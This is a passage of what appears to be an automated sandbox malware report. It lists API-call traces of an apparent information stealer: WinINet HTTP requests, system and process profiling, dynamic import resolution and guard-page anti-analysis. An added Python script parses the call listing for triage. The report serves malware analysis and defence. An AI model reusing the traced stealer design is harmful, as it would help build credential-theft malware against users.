14608->14609 14610 ba15d9 14609->14610 14611 bba7a0 lstrcpy 14610->14611 14612 ba1663 14611->14612 14613 bb5510 14612->14613 14614 bb5521 14613->14614 14615 bba820 2 API calls 14614->14615 14616 bb552e 14615->14616 14617 bba820 2 API calls 14616->14617 14618 bb553b 14617->14618 14619 bba820 2 API calls 14618->14619 14620 bb5548 14619->14620 14621 bba740 lstrcpy 14620->14621 14622 bb5555 14621->14622 14623 bba740 lstrcpy 14622->14623 14624 bb5562 14623->14624 14625 bba740 lstrcpy 14624->14625 14626 bb556f 14625->14626 14627 bba740 lstrcpy 14626->14627 14647 bb557c 14627->14647 14628 bb5643 StrCmpCA 14628->14647 14629 bb56a0 StrCmpCA 14630 bb57dc 14629->14630 14629->14647 14631 bba8a0 lstrcpy 14630->14631 14632 bb57e8 14631->14632 14633 bba820 2 API calls 14632->14633 14635 bb57f6 14633->14635 14634 bba820 lstrlen lstrcpy 14634->14647 14637 bba820 2 API calls 14635->14637 14636 bb5856 StrCmpCA 14638 bb5991 14636->14638 14636->14647 14642 bb5805 14637->14642 14641 bba8a0 lstrcpy 14638->14641 14639 bba740 lstrcpy 14639->14647 14640 bba7a0 lstrcpy 14640->14647 14643 bb599d 14641->14643 14644 ba1670 lstrcpy 14642->14644 14646 bba820 2 API calls 14643->14646 14667 bb5811 14644->14667 14645 ba1590 lstrcpy 14645->14647 14648 bb59ab 14646->14648 14647->14628 14647->14629 14647->14634 14647->14636 14647->14639 14647->14640 14647->14645 14649 bb5a0b StrCmpCA 14647->14649 14650 bb51f0 20 API calls 14647->14650 14660 bb52c0 25 API calls 14647->14660 14662 bb578a StrCmpCA 14647->14662 14664 bba8a0 lstrcpy 14647->14664 14666 bb593f StrCmpCA 14647->14666 14651 bba820 2 API calls 14648->14651 14652 bb5a28 14649->14652 14653 bb5a16 Sleep 14649->14653 14650->14647 14654 bb59ba 14651->14654 14655 bba8a0 lstrcpy 14652->14655 14653->14647 14656 ba1670 lstrcpy 14654->14656 14657 bb5a34 14655->14657 14656->14667 14658 bba820 2 API calls 14657->14658 14659 bb5a43 14658->14659 14661 bba820 2 API calls 14659->14661 14660->14647 14663 bb5a52 14661->14663 14662->14647 14665 ba1670 lstrcpy 
14663->14665 14664->14647 14665->14667 14666->14647 14667->13720 14669 bb754c 14668->14669 14670 bb7553 GetVolumeInformationA 14668->14670 14669->14670 14674 bb7591 14670->14674 14671 bb75fc GetProcessHeap RtlAllocateHeap 14672 bb7619 14671->14672 14673 bb7628 wsprintfA 14671->14673 14675 bba740 lstrcpy 14672->14675 14676 bba740 lstrcpy 14673->14676 14674->14671 14677 bb5da7 14675->14677 14676->14677 14677->13741 14679 bba7a0 lstrcpy 14678->14679 14680 ba4899 14679->14680 15732 ba47b0 14680->15732 14682 ba48a5 14683 bba740 lstrcpy 14682->14683 14684 ba48d7 14683->14684 14685 bba740 lstrcpy 14684->14685 14686 ba48e4 14685->14686 14687 bba740 lstrcpy 14686->14687 14688 ba48f1 14687->14688 14689 bba740 lstrcpy 14688->14689 14690 ba48fe 14689->14690 14691 bba740 lstrcpy 14690->14691 14692 ba490b InternetOpenA StrCmpCA 14691->14692 14693 ba4944 14692->14693 14694 ba4ecb InternetCloseHandle 14693->14694 15738 bb8b60 14693->15738 14696 ba4ee8 14694->14696 15753 ba9ac0 CryptStringToBinaryA 14696->15753 14697 ba4963 15746 bba920 14697->15746 14700 ba4976 14702 bba8a0 lstrcpy 14700->14702 14708 ba497f 14702->14708 14703 bba820 2 API calls 14704 ba4f05 14703->14704 14706 bba9b0 4 API calls 14704->14706 14705 ba4f27 ctype 14710 bba7a0 lstrcpy 14705->14710 14707 ba4f1b 14706->14707 14709 bba8a0 lstrcpy 14707->14709 14711 bba9b0 4 API calls 14708->14711 14709->14705 14722 ba4f57 14710->14722 14712 ba49a9 14711->14712 14713 bba8a0 lstrcpy 14712->14713 14714 ba49b2 14713->14714 14715 bba9b0 4 API calls 14714->14715 14716 ba49d1 14715->14716 14717 bba8a0 lstrcpy 14716->14717 14718 ba49da 14717->14718 14719 bba920 3 API calls 14718->14719 14720 ba49f8 14719->14720 14721 bba8a0 lstrcpy 14720->14721 14723 ba4a01 14721->14723 14722->13744 14724 bba9b0 4 API calls 14723->14724 14725 ba4a20 14724->14725 14726 bba8a0 lstrcpy 14725->14726 14727 ba4a29 14726->14727 14728 bba9b0 4 API calls 14727->14728 14729 ba4a48 14728->14729 14730 bba8a0 lstrcpy 14729->14730 14731 ba4a51 14730->14731 
14732 bba9b0 4 API calls 14731->14732 14733 ba4a7d 14732->14733 14734 bba920 3 API calls 14733->14734 14735 ba4a84 14734->14735 14736 bba8a0 lstrcpy 14735->14736 14737 ba4a8d 14736->14737 14738 ba4aa3 InternetConnectA 14737->14738 14738->14694 14739 ba4ad3 HttpOpenRequestA 14738->14739 14741 ba4b28 14739->14741 14742 ba4ebe InternetCloseHandle 14739->14742 14743 bba9b0 4 API calls 14741->14743 14742->14694 14744 ba4b3c 14743->14744 14745 bba8a0 lstrcpy 14744->14745 14746 ba4b45 14745->14746 14747 bba920 3 API calls 14746->14747 14748 ba4b63 14747->14748 14749 bba8a0 lstrcpy 14748->14749 14750 ba4b6c 14749->14750 14751 bba9b0 4 API calls 14750->14751 14752 ba4b8b 14751->14752 14753 bba8a0 lstrcpy 14752->14753 14754 ba4b94 14753->14754 14755 bba9b0 4 API calls 14754->14755 14756 ba4bb5 14755->14756 14757 bba8a0 lstrcpy 14756->14757 14758 ba4bbe 14757->14758 14759 bba9b0 4 API calls 14758->14759 14760 ba4bde 14759->14760 14761 bba8a0 lstrcpy 14760->14761 14762 ba4be7 14761->14762 14763 bba9b0 4 API calls 14762->14763 14764 ba4c06 14763->14764 14765 bba8a0 lstrcpy 14764->14765 14766 ba4c0f 14765->14766 14767 bba920 3 API calls 14766->14767 14768 ba4c2d 14767->14768 14769 bba8a0 lstrcpy 14768->14769 14770 ba4c36 14769->14770 14771 bba9b0 4 API calls 14770->14771 14772 ba4c55 14771->14772 14773 bba8a0 lstrcpy 14772->14773 14774 ba4c5e 14773->14774 14775 bba9b0 4 API calls 14774->14775 14776 ba4c7d 14775->14776 14777 bba8a0 lstrcpy 14776->14777 14778 ba4c86 14777->14778 14779 bba920 3 API calls 14778->14779 14780 ba4ca4 14779->14780 14781 bba8a0 lstrcpy 14780->14781 14782 ba4cad 14781->14782 14783 bba9b0 4 API calls 14782->14783 14784 ba4ccc 14783->14784 14785 bba8a0 lstrcpy 14784->14785 14786 ba4cd5 14785->14786 14787 bba9b0 4 API calls 14786->14787 14788 ba4cf6 14787->14788 14789 bba8a0 lstrcpy 14788->14789 14790 ba4cff 14789->14790 14791 bba9b0 4 API calls 14790->14791 14792 ba4d1f 14791->14792 14793 bba8a0 lstrcpy 14792->14793 14794 ba4d28 14793->14794 14795 bba9b0 4 
API calls 14794->14795 14796 ba4d47 14795->14796 14797 bba8a0 lstrcpy 14796->14797 14798 ba4d50 14797->14798 14799 bba920 3 API calls 14798->14799 14800 ba4d6e 14799->14800 14801 bba8a0 lstrcpy 14800->14801 14802 ba4d77 14801->14802 14803 bba740 lstrcpy 14802->14803 14804 ba4d92 14803->14804 14805 bba920 3 API calls 14804->14805 14806 ba4db3 14805->14806 14807 bba920 3 API calls 14806->14807 14808 ba4dba 14807->14808 14809 bba8a0 lstrcpy 14808->14809 14810 ba4dc6 14809->14810 14811 ba4de7 lstrlen 14810->14811 14812 ba4dfa 14811->14812 14813 ba4e03 lstrlen 14812->14813 15752 bbaad0 14813->15752 14815 ba4e13 HttpSendRequestA 14816 ba4e32 InternetReadFile 14815->14816 14817 ba4e67 InternetCloseHandle 14816->14817 14822 ba4e5e 14816->14822 14819 bba800 14817->14819 14819->14742 14820 bba9b0 4 API calls 14820->14822 14821 bba8a0 lstrcpy 14821->14822 14822->14816 14822->14817 14822->14820 14822->14821 15759 bbaad0 14823->15759 14825 bb17c4 StrCmpCA 14826 bb17cf ExitProcess 14825->14826 14837 bb17d7 14825->14837 14827 bb19c2 14827->13746 14828 bb187f StrCmpCA 14828->14837 14829 bb185d StrCmpCA 14829->14837 14830 bb1913 StrCmpCA 14830->14837 14831 bb1932 StrCmpCA 14831->14837 14832 bb18f1 StrCmpCA 14832->14837 14833 bb1951 StrCmpCA 14833->14837 14834 bb1970 StrCmpCA 14834->14837 14835 bb18cf StrCmpCA 14835->14837 14836 bb18ad StrCmpCA 14836->14837 14837->14827 14837->14828 14837->14829 14837->14830 14837->14831 14837->14832 14837->14833 14837->14834 14837->14835 14837->14836 14838 bba820 lstrlen lstrcpy 14837->14838 14838->14837 14840 bba7a0 lstrcpy 14839->14840 14841 ba5979 14840->14841 14842 ba47b0 2 API calls 14841->14842 14843 ba5985 14842->14843 14844 bba740 lstrcpy 14843->14844 14845 ba59ba 14844->14845 14846 bba740 lstrcpy 14845->14846 14847 ba59c7 14846->14847 14848 bba740 lstrcpy 14847->14848 14849 ba59d4 14848->14849 14850 bba740 lstrcpy 14849->14850 14851 ba59e1 14850->14851 14852 bba740 lstrcpy 14851->14852 14853 ba59ee InternetOpenA StrCmpCA 14852->14853 14854 
Control-flow graph edge dump for the preceding functions omitted (graph rendering residue). The API calls recorded along those edges, grouped by purpose:
• HTTP client via WinINet: InternetOpenA, InternetCrackUrlA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetOpenUrlA, InternetCloseHandle
• Base64 via CryptoAPI: CryptStringToBinaryA, CryptBinaryToStringA (buffers from LocalAlloc/LocalFree and GetProcessHeap/RtlAllocateHeap/HeapFree)
• System information collection: GetCurrentProcess/IsWow64Process, GetLocalTime, GetSystemTime, GetTimeZoneInformation, GetUserDefaultLocaleName, GetKeyboardLayoutList/GetLocaleInfoA, GetSystemPowerStatus, GetCurrentProcessId/OpenProcess/GetModuleFileNameExA, GetSystemInfo, GetLogicalProcessorInformationEx/GetLastError, GlobalMemoryStatusEx, RegOpenKeyExA/RegEnumKeyExA/RegQueryValueExA/RegCloseKey
• Process enumeration: CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle
• Module loading and import resolution: VirtualAlloc, LoadLibraryA, GetProcAddress, VirtualFree, FreeLibrary
• String handling throughout: lstrcpy, lstrcat, lstrlen, StrCmpCA, wsprintfA, CharToOemW

                                  Control-flow Graph
                                  Graph rendering omitted. Function bb9860-bb9bc2: after a call to bb9750, one path resolves 21 imports via GetProcAddress from a single module handle (blocks bb987a-bb9a8e), the other skips straight to bb9a93-bb9af2, where five LoadLibraryA calls are followed by conditional GetProcAddress lookups against the newly loaded modules, one of them with the plaintext name NtQueryInformationProcess (see APIs below).
                                  APIs
                                  • GetProcAddress.KERNEL32(76210000,01401A38), ref: 00BB98A1
                                  • GetProcAddress.KERNEL32(76210000,01401918), ref: 00BB98BA
                                  • GetProcAddress.KERNEL32(76210000,014018B8), ref: 00BB98D2
                                  • GetProcAddress.KERNEL32(76210000,01401768), ref: 00BB98EA
                                  • GetProcAddress.KERNEL32(76210000,014018E8), ref: 00BB9903
                                  • GetProcAddress.KERNEL32(76210000,01409C60), ref: 00BB991B
                                  • GetProcAddress.KERNEL32(76210000,013F5428), ref: 00BB9933
                                  • GetProcAddress.KERNEL32(76210000,013F55E8), ref: 00BB994C
                                  • GetProcAddress.KERNEL32(76210000,01401750), ref: 00BB9964
                                  • GetProcAddress.KERNEL32(76210000,014018A0), ref: 00BB997C
                                  • GetProcAddress.KERNEL32(76210000,01401930), ref: 00BB9995
                                  • GetProcAddress.KERNEL32(76210000,014017C8), ref: 00BB99AD
                                  • GetProcAddress.KERNEL32(76210000,013F53A8), ref: 00BB99C5
                                  • GetProcAddress.KERNEL32(76210000,01401948), ref: 00BB99DE
                                  • GetProcAddress.KERNEL32(76210000,01401780), ref: 00BB99F6
                                  • GetProcAddress.KERNEL32(76210000,013F54A8), ref: 00BB9A0E
                                  • GetProcAddress.KERNEL32(76210000,01401798), ref: 00BB9A27
                                  • GetProcAddress.KERNEL32(76210000,014017E0), ref: 00BB9A3F
                                  • GetProcAddress.KERNEL32(76210000,013F5448), ref: 00BB9A57
                                  • GetProcAddress.KERNEL32(76210000,01401960), ref: 00BB9A70
                                  • GetProcAddress.KERNEL32(76210000,013F56E8), ref: 00BB9A88
                                  • LoadLibraryA.KERNEL32(01401978,?,00BB6A00), ref: 00BB9A9A
                                  • LoadLibraryA.KERNEL32(014019A8,?,00BB6A00), ref: 00BB9AAB
                                  • LoadLibraryA.KERNEL32(014019C0,?,00BB6A00), ref: 00BB9ABD
                                  • LoadLibraryA.KERNEL32(014019D8,?,00BB6A00), ref: 00BB9ACF
                                  • LoadLibraryA.KERNEL32(01401840,?,00BB6A00), ref: 00BB9AE0
                                  • GetProcAddress.KERNEL32(75B30000,014017F8), ref: 00BB9B02
                                  • GetProcAddress.KERNEL32(751E0000,01401810), ref: 00BB9B23
                                  • GetProcAddress.KERNEL32(751E0000,01401828), ref: 00BB9B3B
                                  • GetProcAddress.KERNEL32(76910000,0140A0E8), ref: 00BB9B5D
                                  • GetProcAddress.KERNEL32(75670000,013F53E8), ref: 00BB9B7E
                                  • GetProcAddress.KERNEL32(77310000,01409BB0), ref: 00BB9B9F
                                  • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00BB9BB6
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00BB9BAA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 043a2046a33589e588696d591183d56a031cd9f8d82ca149c6bb915f044ef931
                                  • Instruction ID: b5b01b9db5c5bd0e04938a314bacaa372aa48ee9d41a43f705f73516d9160065
                                  • Opcode Fuzzy Hash: 043a2046a33589e588696d591183d56a031cd9f8d82ca149c6bb915f044ef931
                                  • Instruction Fuzzy Hash: C4A11AB95003829FD354FFACEDC89663BF9F788305705851AA605CB364D639B881DB72
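                                  The APIs listing above is the most useful part of this function block for triage: it shows which module handle each GetProcAddress call resolves from, how many libraries are loaded first, and that only one import name (NtQueryInformationProcess) survives as plaintext, everything else being passed as a pointer into a buffer. The following Python script is an added example, not part of Joe Sandbox or of the analysed sample: it parses report lines of this shape and summarises the resolution pattern, and it also decodes the protection constant of a VirtualProtect call (the RtlAllocateHeap/VirtualProtect lines from the unpacking-stub function further down are included as input). The assumption that Joe Sandbox prints arguments in the API's signature order, so that the third VirtualProtect argument is flNewProtect, is the script's, not the report's; the PAGE_* constants are taken from winnt.h.

```python
"""Summarise a Joe Sandbox per-function 'APIs' listing (added triage example)."""
import re
from collections import Counter

# Constructed input: the API lines of the resolver at 0x00BB9860 on this page,
# plus the two lines of the unpacking stub at 0x00BA45C0 further down.
REPORT_LINES = """\
• GetProcAddress.KERNEL32(76210000,01401A38), ref: 00BB98A1
• GetProcAddress.KERNEL32(76210000,01401918), ref: 00BB98BA
• GetProcAddress.KERNEL32(76210000,014018B8), ref: 00BB98D2
• GetProcAddress.KERNEL32(76210000,01401768), ref: 00BB98EA
• GetProcAddress.KERNEL32(76210000,014018E8), ref: 00BB9903
• GetProcAddress.KERNEL32(76210000,01409C60), ref: 00BB991B
• GetProcAddress.KERNEL32(76210000,013F5428), ref: 00BB9933
• GetProcAddress.KERNEL32(76210000,013F55E8), ref: 00BB994C
• GetProcAddress.KERNEL32(76210000,01401750), ref: 00BB9964
• GetProcAddress.KERNEL32(76210000,014018A0), ref: 00BB997C
• GetProcAddress.KERNEL32(76210000,01401930), ref: 00BB9995
• GetProcAddress.KERNEL32(76210000,014017C8), ref: 00BB99AD
• GetProcAddress.KERNEL32(76210000,013F53A8), ref: 00BB99C5
• GetProcAddress.KERNEL32(76210000,01401948), ref: 00BB99DE
• GetProcAddress.KERNEL32(76210000,01401780), ref: 00BB99F6
• GetProcAddress.KERNEL32(76210000,013F54A8), ref: 00BB9A0E
• GetProcAddress.KERNEL32(76210000,01401798), ref: 00BB9A27
• GetProcAddress.KERNEL32(76210000,014017E0), ref: 00BB9A3F
• GetProcAddress.KERNEL32(76210000,013F5448), ref: 00BB9A57
• GetProcAddress.KERNEL32(76210000,01401960), ref: 00BB9A70
• GetProcAddress.KERNEL32(76210000,013F56E8), ref: 00BB9A88
• LoadLibraryA.KERNEL32(01401978,?,00BB6A00), ref: 00BB9A9A
• LoadLibraryA.KERNEL32(014019A8,?,00BB6A00), ref: 00BB9AAB
• LoadLibraryA.KERNEL32(014019C0,?,00BB6A00), ref: 00BB9ABD
• LoadLibraryA.KERNEL32(014019D8,?,00BB6A00), ref: 00BB9ACF
• LoadLibraryA.KERNEL32(01401840,?,00BB6A00), ref: 00BB9AE0
• GetProcAddress.KERNEL32(75B30000,014017F8), ref: 00BB9B02
• GetProcAddress.KERNEL32(751E0000,01401810), ref: 00BB9B23
• GetProcAddress.KERNEL32(751E0000,01401828), ref: 00BB9B3B
• GetProcAddress.KERNEL32(76910000,0140A0E8), ref: 00BB9B5D
• GetProcAddress.KERNEL32(75670000,013F53E8), ref: 00BB9B7E
• GetProcAddress.KERNEL32(77310000,01409BB0), ref: 00BB9B9F
• GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00BB9BB6
• RtlAllocateHeap.NTDLL(00000000), ref: 00BA460F
• VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00BA479C
"""

# One entry: "• <Api>.<Module>(<arg>,<arg>,...), ref: <caller address>"
LINE_RE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")

# Page-protection constants from winnt.h; 0x100 (PAGE_GUARD) is the one behind
# the "create guard pages" signature in this report.
PAGE_FLAGS = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
              0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
              0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
              0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}


def is_hex(arg):
    """True for the 8-digit hex values the report uses for pointers and handles."""
    return re.fullmatch(r"[0-9A-Fa-f]{8}", arg) is not None


def parse_api_lines(text):
    """Return [(api, module, [args], ref)] for every line that is an API entry."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            api, module, args, ref = m.groups()
            calls.append((api, module, [a.strip() for a in args.split(",")], ref))
    return calls


def summarize_resolution(calls):
    """Group GetProcAddress by the module handle (first argument) it resolves
    from; names passed as pointers stay opaque, so only the import names that
    survive as plaintext are collected."""
    per_module, plaintext, loaded = Counter(), [], 0
    for api, _mod, args, _ref in calls:
        if api == "GetProcAddress" and len(args) >= 2:
            per_module[args[0]] += 1
            if args[1] != "?" and not is_hex(args[1]):
                plaintext.append(args[1])
        elif api == "LoadLibraryA":
            loaded += 1
    return {"getprocaddress_by_module": dict(per_module),
            "loadlibrary_calls": loaded, "plaintext_names": plaintext}


def decode_protect(value):
    """Expand a VirtualProtect flNewProtect value into its PAGE_* names."""
    return [name for bit, name in PAGE_FLAGS.items() if value & bit]


def virtual_protect_flags(calls):
    """Decode the third argument of every VirtualProtect call. Assumption: the
    report prints arguments in signature order (lpAddress, dwSize, flNewProtect,
    lpflOldProtect); '?' marks a value the sandbox could not recover."""
    return [(ref, decode_protect(int(args[2], 16))) for api, _m, args, ref in calls
            if api == "VirtualProtect" and len(args) >= 3 and is_hex(args[2])]


if __name__ == "__main__":
    calls = parse_api_lines(REPORT_LINES)
    print(summarize_resolution(calls))   # 21 lookups against 76210000, 7 against 5 other handles
    print(virtual_protect_flags(calls))  # [('00BA479C', ['PAGE_GUARD'])]
```

                                  Run against the listing above, the summary shows one module handle (76210000) receiving 21 lookups before any LoadLibraryA call, five further handles receiving the remaining seven, and a single readable import name; the VirtualProtect line decodes to PAGE_GUARD, which is what the "guard pages" signature in the overview is keyed on.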

                                  Control-flow Graph
                                  Graph rendering omitted. Function ba45c0-ba47a9: an RtlAllocateHeap call (block ba45c0-ba4695), then a loop between blocks ba46a0-ba46a6 and ba46ac-ba474a, exited into a VirtualProtect call in block ba474f-ba47a9.
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA460F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00BA479C
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (19): 00BA45E8, 00BA45F3, 00BA462D, 00BA4638, 00BA4657, 00BA4662, 00BA466D, 00BA4683, 00BA46AC, 00BA46B7, 00BA46D8, 00BA471E, 00BA4729, 00BA4734, 00BA473F, 00BA475A, 00BA4765, 00BA4770, 00BA477B
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4713
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA45C7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA46C2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA45D2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4678
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA474F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA45DD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA46CD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                   • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United 